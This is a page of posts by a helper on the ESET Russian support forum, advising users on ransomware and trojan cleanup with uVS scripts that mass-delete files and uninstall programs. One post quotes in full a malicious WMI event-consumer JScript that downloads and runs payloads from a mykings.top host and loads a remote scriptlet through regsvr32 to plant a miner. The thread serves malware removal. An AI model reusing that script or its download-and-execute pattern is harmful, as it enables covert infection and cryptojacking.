santy (Все сообщения пользователя) - Форум технической поддержки ESET NOD32

файлы зашифрованы с расширением *.NO_MORE_RANSOM, * .crypted000007, Filecoder.ED / Encoder.858/ Ransom.Shade; r/n: readme*.txt

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 15.06.2017 15:22:15

Дмитрий,

судя по образу автоазапуска система уже очищена от тел шифратора.

по расшифровке: сохраните зашифрованные файлы на отдельный носитель,
возможно когда-нибудь будет расшифровка.

[ Как создать образ автозапуска? ]

Перейти

зашифровано с расширением *[email protected]_*

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 15.06.2017 12:33:56

Цитата
Гиргис ас-Самули написал: А что такое ВИ?

https://virusinfo.info/showthread.php?t=143554

[ Как создать образ автозапуска? ]

Перейти

зашифровано с расширением *[email protected]_*

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 15.06.2017 11:51:44

нет информации по расшифровке этого шифратора, кроме той, что была 4летней давности. (на ВИ)

[ Как создать образ автозапуска? ]

Перейти

зашифровано с расширением *[email protected]_*

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 15.06.2017 10:16:02

Цитата
Гиргис ас-Самули написал: А как здесь пристёгивается файл? Я вижу только вставить ссылку.

используйте опцию ниже окна редактирования.
загрузить файлы.

[ Как создать образ автозапуска? ]

Перейти

зашифровано с расширением *[email protected]_*

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 15.06.2017 10:09:54

@Гиргис ас-Самули,
добавьте несколько зашифрованных файлов в архив, и поместите архив в ваше сообщение

[ Как создать образ автозапуска? ]

Перейти

вирус WIn32/Kryptik.FOIB Прошу помочь

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 14.06.2017 18:06:36

Стас Донцов,
скачайте актуальную (4.0.5) версию uVS отсюда,
http://chklst.ru/data/uVS%20latest/uvs_latest.zip

и еще раз пробуйте выполнить скрипт.

[ Как создать образ автозапуска? ]

Перейти

вирус WIn32/Kryptik.FOIB Прошу помочь

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 14.06.2017 13:34:54

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"

Код
;uVS v4.0.5 [http://dsrt.dyndns.org] ;Target OS: NTv5.1 v400c OFFSGNSAVE ;------------------------autoscript--------------------------- deldirex %SystemDrive%\PROGRAM FILES\CONDUIT\COMMUNITY ALERTS delref %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\CIS30.EXE delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMIN\APPLICATION DATA\{74AABF24-45E2-FA1E-B28C-350799EDCD80}\D9156FBB.EXE delref F:\AUTORUN.EXE delref G:\AUTORUN.EXE delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DDHDGFFKKEBHMKFJOJEJMPBLDMPOBFKFO%26INSTALLSOURCE%3DONDEMAND%26UC delref HTTP://SEARCH.CONDUIT.COM/RESULTSEXT.ASPX?Q={SEARCHTERMS}&SEARCHSOURCE=4&CTID=CT2475029 apply ; Conduit Engine exec C:\PROGRA~1\CONDUI~1\ConduitEngineUninstall.exe ; Java(TM) 6 Update 27 exec MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216027FF} /quiet deltmp delref %SystemDrive%\PROGRAM FILES\HACKER ELIMINATOR\HESHELL.DLL delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID] delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID] delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID] delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID] delref {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\[CLSID] delref %SystemDrive%\PROGRAM FILES\CONDUITENGINE\PRXCONDUITENGINE.DLL delref %SystemDrive%\PROGRAM FILES\MYASHAMPOO\PRXTBMYAS.DLL delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID] delref {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBC}\[CLSID] delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID] delref %SystemDrive%\PROGRA~1\REALTEK\REALTE~1\IR_SERVER.EXE delref %SystemDrive%\PROGRAM FILES\COMMON FILES\WONDERSHARE\WONDERSHARE HELPER COMPACT\WSHELPER.EXE delref %Sys32%\BLANK.HTM delref {42071714-76D4-11D1-8B24-00A0C9068FF3}\[CLSID] delref {764BF0E1-F219-11CE-972D-00AA00A14F56}\[CLSID] delref {853FE2B1-B769-11D0-9C4E-00C04FB6C6FA}\[CLSID] delref {FAC3CBF6-8697-43D0-BAB9-DCD1FCE19D75}\[CLSID] delref %SystemDrive%\PROGRAM FILES\COMMON FILES\ARCSOFT\CONNECTION SERVICE\BIN\ACSERVICE.EXE delref %Sys32%\DRIVERS\CHANGER.SYS delref %Sys32%\DRIVERS\DGIVECP.SYS delref %Sys32%\DRIVERS\EWUSBNET.SYS delref %Sys32%\DRIVERS\EW_HWUSBDEV.SYS delref %Sys32%\DRIVERS\EW_JUBUSENUM.SYS delref %Sys32%\DRIVERS\EWUSBMDM.SYS delref %Sys32%\DRIVERS\I2OMGMT.SYS delref %Sys32%\DRIVERS\LBRTFDC.SYS delref %Sys32%\DRIVERS\MASSFILTER.SYS delref %Sys32%\DRIVERS\PCIDUMP.SYS delref %Sys32%\DRIVERS\PDCOMP.SYS delref %Sys32%\DRIVERS\PDFRAME.SYS delref %Sys32%\DRIVERS\PDRELI.SYS delref %Sys32%\DRIVERS\PDRFRAME.SYS delref %SystemDrive%\PROGRAM FILES\PEERGUARDIAN2\PGFILTER.SYS delref %SystemDrive%\PROGRA~1\RETINA\MODULES\RETINA\SCANNER\RET45.SYS delref %Sys32%\DRIVERS\SSPORT.SYS delref %Sys32%\DRIVERS\USBCAMCL.SYS delref %Sys32%\DRIVERS\VBOXNETFLT.SYS delref %Sys32%\DRIVERS\WDICA.SYS delref %Sys32%\DRIVERS\ZTEUSBMDM6K.SYS delref %Sys32%\DRIVERS\ZTEUSBNMEA.SYS delref %Sys32%\DRIVERS\ZTEUSBSER6K.SYS delref %Sys32%\PSXSS.EXE delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO350.DLL delref %Sys32%\MCL2AE.AX delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL delref %Sys32%\MCM2VE.AX delref %Sys32%\EAPA3HST.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL delref %SystemDrive%\PROGRAM FILES\USB 2.0 PC CAMERA\VANFILTER.DLL delref %SystemDrive%\PROGRAM FILES\CONDUIT\COMMUNITY ALERTS\ALERT.DLL delref %SystemDrive%\PROGRA~1\NETSUR~1\NETSUR~1.OCX delref %SystemDrive%\PROGRA~1\MARS_1~1\MARS18SERVERPS.DLL delref %Sys32%\EAPAHOST.DLL delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL delref %Sys32%\MCMPEG2MUX.AX delref %SystemDrive%\PROGRA~1\COMMON~1\WONDER~1\WONDER~1\WSHELPER.EXE delref %SystemDrive%\PROGRA~1\MARS_1~1\ICOMMONPS.DLL delref %SystemDrive%\PROGRAM FILES\DVR_UTIL\EMERGENCYAGENT\MIDAS.DLL delref %SystemDrive%\PROGRAM FILES\COMODO\COMODO INTERNET SECURITY\CMDAGENT.EXE delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL delref D:\GAMES\WORLD_~1\WOTTWE~1.EXE delref F:\LG_PC_PROGRAMS.EXE delref F:\HTC_SYNC_MANAGER_PC.EXE delref {16A017B9-6CB4-47C7-8E81-6E9396FAC2B6}\[CLSID] delref {30F9B915-B755-4826-820B-08FBA6BD249D}\[CLSID] delref {A1E75A0E-4397-4BA8-BB50-E19FB66890F4}\[CLSID] delref Z:\CONS.EXE ;------------------------------------------------------------- restart

Код


;uVS v4.0.5 [http://dsrt.dyndns.org]
;Target OS: NTv5.1
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

deldirex %SystemDrive%\PROGRAM FILES\CONDUIT\COMMUNITY ALERTS

delref %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\CIS30.EXE
delref %SystemDrive%\DOCUMENTS AND SETTINGS\ADMIN\APPLICATION DATA\{74AABF24-45E2-FA1E-B28C-350799EDCD80}\D9156FBB.EXE
delref F:\AUTORUN.EXE
delref G:\AUTORUN.EXE
delref HTTP://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DDHDGFFKKEBHMKFJOJEJMPBLDMPOBFKFO%26INSTALLSOURCE%3DONDEMAND%26UC
delref HTTP://SEARCH.CONDUIT.COM/RESULTSEXT.ASPX?Q={SEARCHTERMS}&SEARCHSOURCE=4&CTID=CT2475029
apply

; Conduit Engine
exec C:\PROGRA~1\CONDUI~1\ConduitEngineUninstall.exe
; Java(TM) 6 Update 27
exec MsiExec.exe /X{26A24AE4-039D-4CA4-87B4-2F83216027FF} /quiet
deltmp
delref %SystemDrive%\PROGRAM FILES\HACKER ELIMINATOR\HESHELL.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\CONDUITENGINE\PRXCONDUITENGINE.DLL
delref %SystemDrive%\PROGRAM FILES\MYASHAMPOO\PRXTBMYAS.DLL
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBC}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref %SystemDrive%\PROGRA~1\REALTEK\REALTE~1\IR_SERVER.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\WONDERSHARE\WONDERSHARE HELPER COMPACT\WSHELPER.EXE
delref %Sys32%\BLANK.HTM
delref {42071714-76D4-11D1-8B24-00A0C9068FF3}\[CLSID]
delref {764BF0E1-F219-11CE-972D-00AA00A14F56}\[CLSID]
delref {853FE2B1-B769-11D0-9C4E-00C04FB6C6FA}\[CLSID]
delref {FAC3CBF6-8697-43D0-BAB9-DCD1FCE19D75}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\ARCSOFT\CONNECTION SERVICE\BIN\ACSERVICE.EXE
delref %Sys32%\DRIVERS\CHANGER.SYS
delref %Sys32%\DRIVERS\DGIVECP.SYS
delref %Sys32%\DRIVERS\EWUSBNET.SYS
delref %Sys32%\DRIVERS\EW_HWUSBDEV.SYS
delref %Sys32%\DRIVERS\EW_JUBUSENUM.SYS
delref %Sys32%\DRIVERS\EWUSBMDM.SYS
delref %Sys32%\DRIVERS\I2OMGMT.SYS
delref %Sys32%\DRIVERS\LBRTFDC.SYS
delref %Sys32%\DRIVERS\MASSFILTER.SYS
delref %Sys32%\DRIVERS\PCIDUMP.SYS
delref %Sys32%\DRIVERS\PDCOMP.SYS
delref %Sys32%\DRIVERS\PDFRAME.SYS
delref %Sys32%\DRIVERS\PDRELI.SYS
delref %Sys32%\DRIVERS\PDRFRAME.SYS
delref %SystemDrive%\PROGRAM FILES\PEERGUARDIAN2\PGFILTER.SYS
delref %SystemDrive%\PROGRA~1\RETINA\MODULES\RETINA\SCANNER\RET45.SYS
delref %Sys32%\DRIVERS\SSPORT.SYS
delref %Sys32%\DRIVERS\USBCAMCL.SYS
delref %Sys32%\DRIVERS\VBOXNETFLT.SYS
delref %Sys32%\DRIVERS\WDICA.SYS
delref %Sys32%\DRIVERS\ZTEUSBMDM6K.SYS
delref %Sys32%\DRIVERS\ZTEUSBNMEA.SYS
delref %Sys32%\DRIVERS\ZTEUSBSER6K.SYS
delref %Sys32%\PSXSS.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\DAO\DAO350.DLL
delref %Sys32%\MCL2AE.AX
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.1\PSMACHINE.DLL
delref %Sys32%\MCM2VE.AX
delref %Sys32%\EAPA3HST.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.28.15\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES\USB 2.0 PC CAMERA\VANFILTER.DLL
delref %SystemDrive%\PROGRAM FILES\CONDUIT\COMMUNITY ALERTS\ALERT.DLL
delref %SystemDrive%\PROGRA~1\NETSUR~1\NETSUR~1.OCX
delref %SystemDrive%\PROGRA~1\MARS_1~1\MARS18SERVERPS.DLL
delref %Sys32%\EAPAHOST.DLL
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.1\PSMACHINE.DLL
delref %Sys32%\MCMPEG2MUX.AX
delref %SystemDrive%\PROGRA~1\COMMON~1\WONDER~1\WONDER~1\WSHELPER.EXE
delref %SystemDrive%\PROGRA~1\MARS_1~1\ICOMMONPS.DLL
delref %SystemDrive%\PROGRAM FILES\DVR_UTIL\EMERGENCYAGENT\MIDAS.DLL
delref %SystemDrive%\PROGRAM FILES\COMODO\COMODO INTERNET SECURITY\CMDAGENT.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
delref D:\GAMES\WORLD_~1\WOTTWE~1.EXE
delref F:\LG_PC_PROGRAMS.EXE
delref F:\HTC_SYNC_MANAGER_PC.EXE
delref {16A017B9-6CB4-47C7-8E81-6E9396FAC2B6}\[CLSID]
delref {30F9B915-B755-4826-820B-08FBA6BD249D}\[CLSID]
delref {A1E75A0E-4397-4BA8-BB50-E19FB66890F4}\[CLSID]
delref Z:\CONS.EXE
;-------------------------------------------------------------

restart

перезагрузка, пишем о старых и новых проблемах.
----------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/

[ Как создать образ автозапуска? ]

Перейти

[ Закрыто] Оперативная память = C:\WINDOWS\Debug\item.dat;Win32/Agent.WTF троянская программа;, ETERNALBLUE/ WMI/ActiveScriptEventConsumer/FUCKYOUMM2_CONSUMER

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 13.06.2017 10:21:48

скрипт надо выполнить обязательно, потому что он очищает левый обработчик событий WMI.

этот обработчик и добавляет вам в систему вредоносные файлы из сети, которые пока гасятся антивирусом.

Цитата
Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER] Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER] Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске Удовлетворяет критериям WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)] Сохраненная информация на момент создания образа Статус в автозапуске Namespace \\.\root\subscription Consumer_Name fuckyoumm2_consumer Consumer_Class ActiveScriptEventConsumer Consumer_ScriptingEngine Jscript Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa"); Filter_Name fuckyoumm2_filter Filter_Class __EventFilter Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer" #MOF_Bind# instance of __FilterToConsumerBinding { Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="fuckyoumm2_consumer""; Filter = "\\\\.\\root\\subscription:__EventFilter.Name="fuckyoumm2_filter""; }; #MOF_Event# instance of __EventFilter { Name = "fuckyoumm2_filter"; Query = "select * from __timerevent where timerid="fuckyoumm2_itimer""; QueryLanguage = "wql"; };

Цитата

Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

Удовлетворяет критериям
WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ FUCKYOUMM2_CONSUMER)(1) [delall (0)]

Сохраненная информация на момент создания образа
Статус в автозапуске

Namespace \\.\root\subscription
Consumer_Name fuckyoumm2_consumer
Consumer_Class ActiveScriptEventConsumer
Consumer_ScriptingEngine Jscript
Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr[i].split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr[i].split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name fuckyoumm2_filter
Filter_Class __EventFilter
Filter_Query select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#
instance of __FilterToConsumerBinding
{
Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="fuckyoumm2_consumer"";
Filter = "\\\\.\\root\\subscription:__EventFilter.Name="fuckyoumm2_filter"";
};

#MOF_Event#
instance of __EventFilter
{
Name = "fuckyoumm2_filter";
Query = "select * from __timerevent where timerid="fuckyoumm2_itimer"";
QueryLanguage = "wql";
};

через этот обработчик выполняется попытка установить в систему майнер криптовалюты.

[ Как создать образ автозапуска? ]

Перейти

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 13.06.2017 09:47:43

скрипт в uVS выполнили?

файл c2.bat как раз нам интересен, потому что в образ он (список команд бат файла) попадает не полностью.

[ Как создать образ автозапуска? ]

Перейти

LiveCD не видит жесткие диски. заражений нет

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 11.06.2017 01:39:33

может проблема с самими дисками, что они не читабельны?
проверьте возможность их чтения на с помощью других загрузочных дисков,
например, winpe.

[ Как создать образ автозапуска? ]

Перейти